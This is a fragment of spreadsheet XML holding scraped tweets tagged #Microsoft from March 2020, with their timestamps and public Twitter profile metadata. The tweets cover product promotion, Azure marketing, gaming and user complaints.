  </si>
  <si>
    <t>#fedora needs to #deletegithub
They outsourced too much to #microsoft #proprietarysoftware 
https://t.co/8LJSZoeoQM</t>
  </si>
  <si>
    <t>Wed Mar 04 02:34:36 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/wTwRKledjo</t>
  </si>
  <si>
    <t>Wed Mar 04 02:27:56 +0000 2020</t>
  </si>
  <si>
    <t>Check out MICROSOFT WINDOWS 10 PRO PROFESSIONAL 32-BIT&amp;amp;64-BIT OEM FULL VERSION #Microsoft https://t.co/sPEPxhyjfD via @eBay</t>
  </si>
  <si>
    <t>{'id': 1599905460, 'id_str': '1599905460', 'name': 'Dragon Lee', 'screen_name': 'Dragon_God2012', 'location': 'Springfield, MO', 'description': 'E-Retailer Owner', 'url': 'https://t.co/GspQzCEru9', 'entities': {'url': {'urls': [{'url': 'https://t.co/GspQzCEru9', 'expanded_url': 'https://www.facebook.com/DragonGod2012', 'display_url': 'facebook.com/DragonGod2012', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 87, 'listed_count': 2, 'created_at': 'Wed Jul 17 03:32:17 +0000 2013', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2639,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'http://pbs.twimg.com/profile_images/493880939584294912/cwgCvhyZ_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/493880939584294912/cwgCvhyZ_normal.jpeg', 'profile_link_color': '000000',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</si>
  <si>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02:27:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Visual Studio Roadmap: https://t.co/PUKebonzfo #VisualStudio #DotNet #DotNetCore #CSharp #Blazor</t>
  </si>
  <si>
    <t>{'id': 15677510, 'id_str': '15677510', 'name': 'Bart Czernicki', 'screen_name': 'bartczernicki', 'location': 'NJ, USA', 'description': 'Technology Leader &amp; Author.  Work @Microsoft on Machine Intelligence &amp; Azure.  Just #Statistics, #AI, #MachineLearning. GitHub: https://t.co/ccxXILYaV2', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/ccxXILYaV2', 'expanded_url': 'http://github.com/bartczernicki', 'display_url': 'github.com/bartczernicki', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 373, 'friends_count': 118, 'listed_count': 111, 'created_at': 'Thu Jul 31 17:20:28 +0000 2008', 'favourites_count': 342, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1758,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'http://pbs.twimg.com/profile_images/1080451761704448000/MYf1qW_h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080451761704448000/MYf1qW_h_normal.jpg',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</si>
  <si>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02:25:34 +0000 2020</t>
  </si>
  <si>
    <t>With #MicrosoftDynamics
Dynamics, unify your data, get predictive insights ,achieve amazing results and so much more:
Learn more about our #MSDynamics expertise here: https://t.co/ClX9RBqNoH
#Microsoft #MicrosoftPartner #CRM #customerrelationshipmanagement #digitaltransformation https://t.co/OIZBdPNFD6</t>
  </si>
  <si>
    <t>Wed Mar 04 02:22:13 +0000 2020</t>
  </si>
  <si>
    <t>88 percent of companies report that having a unified #DigitalWorkspace has saved them nearly $5 million over three years. Subscribe now to learn how you can save both time and money with #Microsoft. https://t.co/7dRkxlsFPa</t>
  </si>
  <si>
    <t>{'id': 77996529, 'id_str': '77996529', 'name': 'Rick Vosila', 'screen_name': 'vosila', 'location': 'Sydney', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Mon Sep 28 12:08:59 +0000 2009', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 660,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'http://pbs.twimg.com/profile_images/983198309991964673/Wjk_YUL0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983198309991964673/Wjk_YUL0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/77996529/1521524718',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</si>
  <si>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02:16:10 +0000 2020</t>
  </si>
  <si>
    <t>On Tuesdays, Air Assault is KING!
.
 @agonzaga46
.
#teamairassault #teamairassaulttuesday #airassault #anvilstation #halo #haloreach #halocosplay #xbox #xbox360 #xboxonex #microsoft #xboxone #343industries #bungie #cosplay #cosplayersofinstagram #ev... https://t.co/Mb5d4LcG6I https://t.co/ZSSCAJmJeb</t>
  </si>
  <si>
    <t>Wed Mar 04 02:14:56 +0000 2020</t>
  </si>
  <si>
    <t>@BojanaVukov a similar example 
How AI is building better gas stations and transforming Shells global energy business https://t.co/KACQ5ZWNcL
#Shell #Microsoft #AI #computervision #Azure</t>
  </si>
  <si>
    <t>{'id': 1210176366999683072, 'id_str': '1210176366999683072', 'name': 'PyKeyo', 'screen_name': 'PyKeyo', 'location': 'Kurdistan', 'description': '20 salÃ® me Ã» endazyarÃ®ya nermalavan dixwÃ®nim #AI  #NLP  #GANs | Ã» yekemÃ®n OCR kurdÃ® ji bo rÃªnivÃ®sa aramÃ® min Ã§Ãªkirye.', 'url': 'https://t.co/KkNOgR0Ftv', 'entities': {'url': {'urls': [{'url': 'https://t.co/KkNOgR0Ftv', 'expanded_url': 'https://keyo-chali.com', 'display_url': 'keyo-chali.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 481, 'friends_count': 1406, 'listed_count': 2, 'created_at': 'Thu Dec 26 12:31:59 +0000 2019', 'favourites_count': 1437, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 321, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213049691807592448/T0dVIvGD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213049691807592448/T0dVIvGD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1210176366999683072/1577366667',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</si>
  <si>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02:13:51 +0000 2020</t>
  </si>
  <si>
    <t>Forms Activity Reports in the Microsoft Admin Center #Microsoft  https://t.co/KkCwYLZPws</t>
  </si>
  <si>
    <t>Wed Mar 04 02:12:22 +0000 2020</t>
  </si>
  <si>
    <t>Should You Boycott PS5 &amp;amp; Xbox Series X Over Links to Uyghur Abuse? #Crypto #microsoft #nintendo #Sony https://t.co/h4g8rcvQhm https://t.co/m0jPKV1abZ</t>
  </si>
  <si>
    <t>Wed Mar 04 02:09:42 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Exell test!!
Ill take me 1:30 min to finish but I did good!!! #microsoft #exell #YouCanDoIt https://t.co/5EHF8DgcGr</t>
  </si>
  <si>
    <t>{'id': 1362501583, 'id_str': '1362501583', 'name': 'Ramon Garay', 'screen_name': 'ramongaray1971', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 29, 'listed_count': 0, 'created_at': 'Thu Apr 18 17:34:04 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/378800000527307188/a45517c7b61966d74bce96648e646082_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000527307188/a45517c7b61966d74bce96648e646082_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1362501583/1559663893',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</si>
  <si>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02:08:01 +0000 2020</t>
  </si>
  <si>
    <t>#Warning Issued For Millions Of #Microsoft #Windows10 Users https://t.co/S9sdXuMPpw
#cybersecurity
#dataprotection
#malware
#cyberattack https://t.co/0emhLh9Ilx</t>
  </si>
  <si>
    <t>{'id': 19508497, 'id_str': '19508497', 'name': 'Shaun Wiggins', 'screen_name': 'shaunwiggins', 'location': 'New York', 'description': 'Former spy. Previous energy exec. Current entrepreneur. Love travel, tech, &amp; learning. "It\'s not the years in your life that count. It\'s the life in your years"', 'url': 'https://t.co/UZJz8DoHqJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/UZJz8DoHqJ', 'expanded_url': 'http://www.soteryx.com', 'display_url': 'soteryx.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2399, 'friends_count': 2197, 'listed_count': 923, 'created_at': 'Sun Jan 25 22:33:33 +0000 2009', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9569,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'http://pbs.twimg.com/profile_images/929705104978206720/rVOhx8VZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/929705104978206720/rVOhx8VZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19508497/1567449815',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</si>
  <si>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02:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#PureFacts extracts #financial insights in seconds and calculates fees more accurately with #AI - #Microsoft #Azure #AI Steven D'Costa @VSkrylev https://t.co/cmrt6gs5kL #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 01:57:33 +0000 2020</t>
  </si>
  <si>
    <t>I love ms paint #Microsoft #mspaint 
#digitalart https://t.co/bFXu277QpZ</t>
  </si>
  <si>
    <t>{'id': 3413918727, 'id_str': '3413918727', 'name': 'artwork by crater ðŸºðŸ¤ðŸ–ðŸ‡¨ðŸ‡¦', 'screen_name': 'bigfootanimato1', 'location': 'Canada', 'description': 'painter, cartoonist, amateur photographer, gamer, film buff, nerd and wizard', 'url': 'https://t.co/k4Y3JJexXg', 'entities': {'url': {'urls': [{'url': 'https://t.co/k4Y3JJexXg', 'expanded_url': 'http://Craterart88.redbubble.com', 'display_url': 'Craterart88.redbubble.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 92, 'friends_count': 281, 'listed_count': 0, 'created_at': 'Tue Aug 11 00:55:36 +0000 2015', 'favourites_count': 4541, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2138,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'http://pbs.twimg.com/profile_images/1219886052359450625/8v8L3iaZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219886052359450625/8v8L3iaZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3413918727/1569136850',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</si>
  <si>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01:57:07 +0000 2020</t>
  </si>
  <si>
    <t>Forms Activity Reports in the Microsoft Admin Center https://t.co/3AdATvBRHy #Microsoft</t>
  </si>
  <si>
    <t>Forms Activity Reports in the Microsoft Admin Center https://t.co/3AdATvTt68 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 01:56:41 +0000 2020</t>
  </si>
  <si>
    <t>How to Disable Windows Defender Credential Guard https://t.co/4iDpvGsgJ4 via @YouTube #Microsoft #Windows #CredentialGuard #WindowsDefender #VMWare #Error #Tech #Technology #SystemAdmin</t>
  </si>
  <si>
    <t>Wed Mar 04 01:56:11 +0000 2020</t>
  </si>
  <si>
    <t>Fileless attack detection for Linux in preview
https://t.co/aSykw1G9yN
#Microsoft #Azure #Cloud #Security</t>
  </si>
  <si>
    <t>{'id': 1091088451, 'id_str': '1091088451', 'name': 'Vikas Kumawat', 'screen_name': 'VikasKumawat80', 'location': '/usr/local/mumbai', 'description': '#Microsoft Certified Professional, #Azure Solutions Architect, #Geek, Learner', 'url': 'https://t.co/gK7qdJhct2', 'entities': {'url': {'urls': [{'url': 'https://t.co/gK7qdJhct2', 'expanded_url': 'https://vikaskumawat.dev', 'display_url': 'vikaskumawat.dev', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 324, 'friends_count': 519, 'listed_count': 21, 'created_at': 'Tue Jan 15 05:04:49 +0000 2013', 'favourites_count': 848, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3953, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDECE9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1193606933208391680/-XlfXF9__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193606933208391680/-XlfXF9__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1091088451/1573412929', 'profile_link_color': '1B95E0',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</si>
  <si>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Mar 04 01:47:09 +0000 2020</t>
  </si>
  <si>
    <t>So #Microsoft, you said buy windless 10 pro and you can have Microsoft Remote Desktop. Right. I need Albert Einstein to make it happen. If its logging on via the internet, good luck. I want my money back.</t>
  </si>
  <si>
    <t>{'id': 701488129903951872, 'id_str': '701488129903951872', 'name': 'MaÂµrÎµÎµn \uf80a Î˜ÃŸriÎµn', 'screen_name': 'OBrienMB_NY', 'location': 'United States', 'description': '#Resist #TheResistance #FBR Trumpers and MAGA blocked', 'url': 'https://t.co/MC9197WplC', 'entities': {'url': {'urls': [{'url': 'https://t.co/MC9197WplC', 'expanded_url': 'https://www.cafepress.com/weresist', 'display_url': 'cafepress.com/weresist', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2099, 'friends_count': 3504, 'listed_count': 16, 'created_at': 'Sun Feb 21 19:26:17 +0000 2016', 'favourites_count': 13806, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16972, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF691F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1025123718928814080/7n4nMUM2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1025123718928814080/7n4nMUM2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/701488129903951872/1571317939',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</si>
  <si>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01:46:33 +0000 2020</t>
  </si>
  <si>
    <t>Civilization 6 Gathering Storm Sid Meier's   #PCGames #Microsoft #Civilization Rise of Fall https://t.co/xTrj1cQ2YK</t>
  </si>
  <si>
    <t>{'id': 365824790, 'id_str': '365824790', 'name': 'ãƒžãƒ«ã‚»ãƒ­', 'screen_name': 'MarceloD_Games', 'location': '   Saturn', 'description': 'ðŸš¸ ðŸŽ® ðŸŒ‘â„¢', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 75, 'listed_count': 0, 'created_at': 'Thu Sep 01 02:26:52 +0000 2011', 'favourites_count': 279, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 276,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'http://pbs.twimg.com/profile_images/1223059909564080129/tV37KFdk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223059909564080129/tV37KFdk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/365824790/1571700868',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</si>
  <si>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01:45:27 +0000 2020</t>
  </si>
  <si>
    <t>Bing Chat, both obtuse AND invasive - Clippy meets Big Brother. Is it a conspiracy? Does Microsoft actually WANT us to be making these embarrassing associations? Because it's really hard not to. #Microsoft #KillBingChat https://t.co/FUxH7wMWgT</t>
  </si>
  <si>
    <t>{'id': 16060941, 'id_str': '16060941', 'name': 'Sharon', 'screen_name': 'pzelchenko', 'location': 'Chicago - Shanghai', 'description': 'I hate politics. Why are you following me?', 'url': 'http://t.co/94aQwn83Xq', 'entities': {'url': {'urls': [{'url': 'http://t.co/94aQwn83Xq', 'expanded_url': 'http://pete.zelchenko.com/', 'display_url': 'pete.zelchenko.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 270, 'listed_count': 8, 'created_at': 'Sun Aug 31 01:46:48 +0000 2008', 'favourites_count': 75, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 393,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'http://pbs.twimg.com/profile_images/253450336/peter_zelchenko_twitter_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/253450336/peter_zelchenko_twitter_normal.jpg',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</si>
  <si>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01:43:13 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 2004 build preview and thoughts  https://t.co/3O5LVfTx6d
 #windows #tutorial #linux #android #apple #firefox #steam #opensource #wndows10 #microsoft #kde #plasma #debian #gimalaji_blake</t>
  </si>
  <si>
    <t>{'id': 2453267994, 'id_str': '2453267994', 'name': '#gimalaji_blake', 'screen_name': 'gimalaji_blake', 'location': 'Tallinn, Harjumaa', 'description': "#gimalaji_blake Single Player Gamer and Streamer at @Twitch,Video Creator at @YouTube.Everyone is welcome!Let's connect and help each other grow!ðŸ™‚", 'url': 'https://t.co/NKpvufzIUO', 'entities': {'url': {'urls': [{'url': 'https://t.co/NKpvufzIUO', 'expanded_url': 'https://www.youtube.com/channel/UC2McgFgDf94rBWWolLjtCyA', 'display_url': 'youtube.com/channel/UC2Mcgâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 703, 'friends_count': 1393, 'listed_count': 9, 'created_at': 'Sat Apr 19 14:43:53 +0000 2014', 'favourites_count': 1137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1273,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'http://pbs.twimg.com/profile_images/1192740472030220289/8UCAZbSL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192740472030220289/8UCAZbSL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2453267994/1559306096',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</si>
  <si>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01:43:03 +0000 2020</t>
  </si>
  <si>
    <t>Just like that, under the cover of Darkness! Halo Combat Evolved had a surprise drop on @Steam.
Players will enjoy 2011 anniversary graphics &amp;amp; lovely unlocked frame rates!
Are you as excited as us to play this original masterpiece
https://t.co/xm2SlgEEuz
#Xbox #Microsoft</t>
  </si>
  <si>
    <t>{'id': 799471397030400001, 'id_str': '799471397030400001', 'name': 'PC419', 'screen_name': 'PC419', 'location': '', 'description': 'PC419 is an organization dedicated to bringing people the latest in Tech &amp; Gaming Tips, Tricks, News, Reviews &amp; Esports.\n#The419', 'url': 'https://t.co/71W2nfll2O', 'entities': {'url': {'urls': [{'url': 'https://t.co/71W2nfll2O', 'expanded_url': 'https://www.pc419.com.au/', 'display_url': 'pc419.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3160, 'friends_count': 939, 'listed_count': 4, 'created_at': 'Fri Nov 18 04:36:49 +0000 2016', 'favourites_count': 5505, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5189,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'http://pbs.twimg.com/profile_images/1211902161279275008/zgT0K_D1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211902161279275008/zgT0K_D1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/799471397030400001/1581210017',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</si>
  <si>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01:41:36 +0000 2020</t>
  </si>
  <si>
    <t>How do you safeguard your data? Protect against the increasing threat of ransomware attacks without breaking the bank. #Microsoft #Azure secures your data from exploitation with built-in protections.    #azure #microsoftazure #microsoft https://t.co/vf5pb232Vc</t>
  </si>
  <si>
    <t>Wed Mar 04 01:40:04 +0000 2020</t>
  </si>
  <si>
    <t>Finding parking spots with Custom Vision and IoT | On .NET  https://t.co/6pQ7eW74iO  #Azure #Microsoft #azureflashnews</t>
  </si>
  <si>
    <t>Wed Mar 04 01:35:28 +0000 2020</t>
  </si>
  <si>
    <t>Check out XBOX 360 S Model 1439 with 11 Games 2 Wireless Controllers Charger &amp;amp; Cables #Microsoft https://t.co/AXvApN1reL via @eBay</t>
  </si>
  <si>
    <t>{'id': 138627589, 'id_str': '138627589', 'name': 'C.D. Watson âŒ', 'screen_name': 'life_benefit', 'location': 'North Florida', 'description': '#Christian #Conservative #Deplorable #Patriot #Entrepreneur #Husband #Father #Grandfather #USMC #Veteran #TRUMP #MAGA #AmericaFirst', 'url': 'https://t.co/GOm8JKlkjI', 'entities': {'url': {'urls': [{'url': 'https://t.co/GOm8JKlkjI', 'expanded_url': 'http://stores.ebay.com/ShabbyShackThrift', 'display_url': 'stores.ebay.com/ShabbyShackThrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6735, 'friends_count': 7116, 'listed_count': 89, 'created_at': 'Fri Apr 30 02:55:09 +0000 2010', 'favourites_count': 31511, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 92929, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A39D9F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1185408363934425088/7Co7i-D-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185408363934425088/7Co7i-D-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/138627589/1571458296', 'profile_link_color': '1812BA', 'profile_sidebar_border_color': '454747', 'profile_sidebar_fill_color': 'A39D9F', 'profile_text_color': '575331', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 01:30:43 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft party at #aiim20 in the real clouds</t>
  </si>
  <si>
    <t>{'id': 143227477, 'id_str': '143227477', 'name': 'Jim Ongena', 'screen_name': 'Ptidaelus', 'location': 'Brussels, Belgium', 'description': 'Owner at Cresyl, improving user workplace interactions, proud to be a functional guy with #SharePoint #Office365 #Nintex #LMS365, active in @biwug', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 175, 'friends_count': 233, 'listed_count': 18, 'created_at': 'Wed May 12 23:10:18 +0000 2010', 'favourites_count': 221, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 903, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '8C542B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/969378886680064000/sG84itPt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/969378886680064000/sG84itPt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/143227477/1519952717', 'profile_link_color': '19CF86', 'profile_sidebar_border_color': '805F36', 'profile_sidebar_fill_color': 'A89858', 'profile_text_color': '4D384D', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 01:21:57 +0000 2020</t>
  </si>
  <si>
    <t>Can't get your Dynamics 365 Business Process Flows to initialize? This is one possible cause: https://t.co/Cfb7k8JUdA #microsoft #dynamics365 https://t.co/Hg3dNGqk1A</t>
  </si>
  <si>
    <t>{'id': 861130790, 'id_str': '861130790', 'name': 'Magnetism Solutions', 'screen_name': 'MagnetismXRM', 'location': 'New Zealand', 'description': 'Magnetism Solutions is a leading Dynamics CRM/xRM solutions provider.', 'url': 'http://t.co/zEfrgfo69f', 'entities': {'url': {'urls': [{'url': 'http://t.co/zEfrgfo69f', 'expanded_url': 'http://www.magnetismsolutions.com', 'display_url': 'magnetismsolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1436, 'friends_count': 452, 'listed_count': 38, 'created_at': 'Thu Oct 04 09:36:15 +0000 2012', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1112,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'http://pbs.twimg.com/profile_images/441375516788928512/CWmUY-pS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/441375516788928512/CWmUY-pS_normal.png', 'profile_link_color': '2FC2EF',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</si>
  <si>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Wed Mar 04 01:18:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases March 2020 Office Updates With Fixes, Improvements
https://t.co/z8SYlY6YGi https://t.co/MWyyEzRllP</t>
  </si>
  <si>
    <t>Wed Mar 04 01:15:09 +0000 2020</t>
  </si>
  <si>
    <t>AlpsLogic IT Solutions has experience &amp;amp; expertise in a broad range of Microsoft technologies and languages  #USA #Canada #hustle #business #entrepreneur #motivation #remote #nomad #angular #Azure #SharePoint #Dotnet #MVC #Microsoft #Technologies https://t.co/avwsogPuTE</t>
  </si>
  <si>
    <t>Wed Mar 04 01:12:38 +0000 2020</t>
  </si>
  <si>
    <t>Global manufacturer Coats moved more than 180 servers and its entire SAP estate to #Microsoft #Azure, reducing run costs by 2530%. Contact Command IT Services to find out what Azure can do for you. https://t.co/QGTjIVmYr6</t>
  </si>
  <si>
    <t>{'id': 788627800358023169, 'id_str': '788627800358023169', 'name': 'Command I.T.', 'screen_name': 'Command_IT_Serv', 'location': 'Western Australia, Australia', 'description': 'Delivering high quality #ITservices, #BusinessCommunicationSolutions, #Data &amp; #Security for SMBs in #Perth, #Karratha, #PortHedland and the #Pilbara region.', 'url': 'https://t.co/FZlgGz3oQy', 'entities': {'url': {'urls': [{'url': 'https://t.co/FZlgGz3oQy', 'expanded_url': 'http://www.commandit.com.au', 'display_url': 'commandit.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 304, 'friends_count': 1062, 'listed_count': 10, 'created_at': 'Wed Oct 19 06:28:14 +0000 2016', 'favourites_count': 360, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2291,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'http://pbs.twimg.com/profile_images/1212896731282563074/H1rCwpM9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212896731282563074/H1rCwpM9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/788627800358023169/1578041255',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</si>
  <si>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01:12:37 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Intrious Technology Sdn Bhd can accelerate your journey with #Microsoft #Azure. https://t.co/utEd1PRozR</t>
  </si>
  <si>
    <t>{'id': 3242918911, 'id_str': '3242918911', 'name': 'Intrious Technology', 'screen_name': 'IntriousTech', 'location': 'Kuala Lumpur, Wilayah Persekutuan Kuala Lumpur', 'description': 'At Intrious Technology Sdn Bhd, we offer customised IT services based on in-depth understanding of our clientsâ€™ business.', 'url': 'https://t.co/UscaHoIAMv', 'entities': {'url': {'urls': [{'url': 'https://t.co/UscaHoIAMv', 'expanded_url': 'https://www.intrious.com', 'display_url': 'intrious.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Fri Jun 12 03:34:35 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139,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'http://pbs.twimg.com/profile_images/609205158124261376/kPPhjucZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/609205158124261376/kPPhjucZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3242918911/1577417747', 'profile_link_color': 'C1272C',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</si>
  <si>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01:12:16 +0000 2020</t>
  </si>
  <si>
    <t>Our mission is to ensure the nations security through scientific research and engineering, responding to new threats in an ever-changing world, and developing new technologies that will benefit people everywhere. Join us as our ! https://t.co/AEhvjqoP8N #Microsoft</t>
  </si>
  <si>
    <t>{'id': 24558066, 'id_str': '24558066', 'name': 'TMJ-SJC IT-.NET Jobs', 'screen_name': 'tmj_sjc_itdnet', 'location': 'San Jose, CA', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in San Jose, CA. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/7sUmnMG7zp', 'entities': {'url': {'urls': [{'url': 'https://t.co/7sUmnMG7zp', 'expanded_url': 'http://bit.ly/2HbUW5d', 'display_url': 'bit.ly/2HbUW5d', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 191, 'friends_count': 173, 'listed_count': 14, 'created_at': 'Sun Mar 15 17:58:57 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 186,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'http://pbs.twimg.com/profile_images/682139871511617536/hHPx6q5t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682139871511617536/hHPx6q5t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24558066/1451469795',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</si>
  <si>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Mar 04 01:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Constant news and improvements in the world of AI and Machine Learning.
#AI #MachineLearning #Azure #Microsoft
https://t.co/Payu5OiGG0</t>
  </si>
  <si>
    <t>Wed Mar 04 01:08:09 +0000 2020</t>
  </si>
  <si>
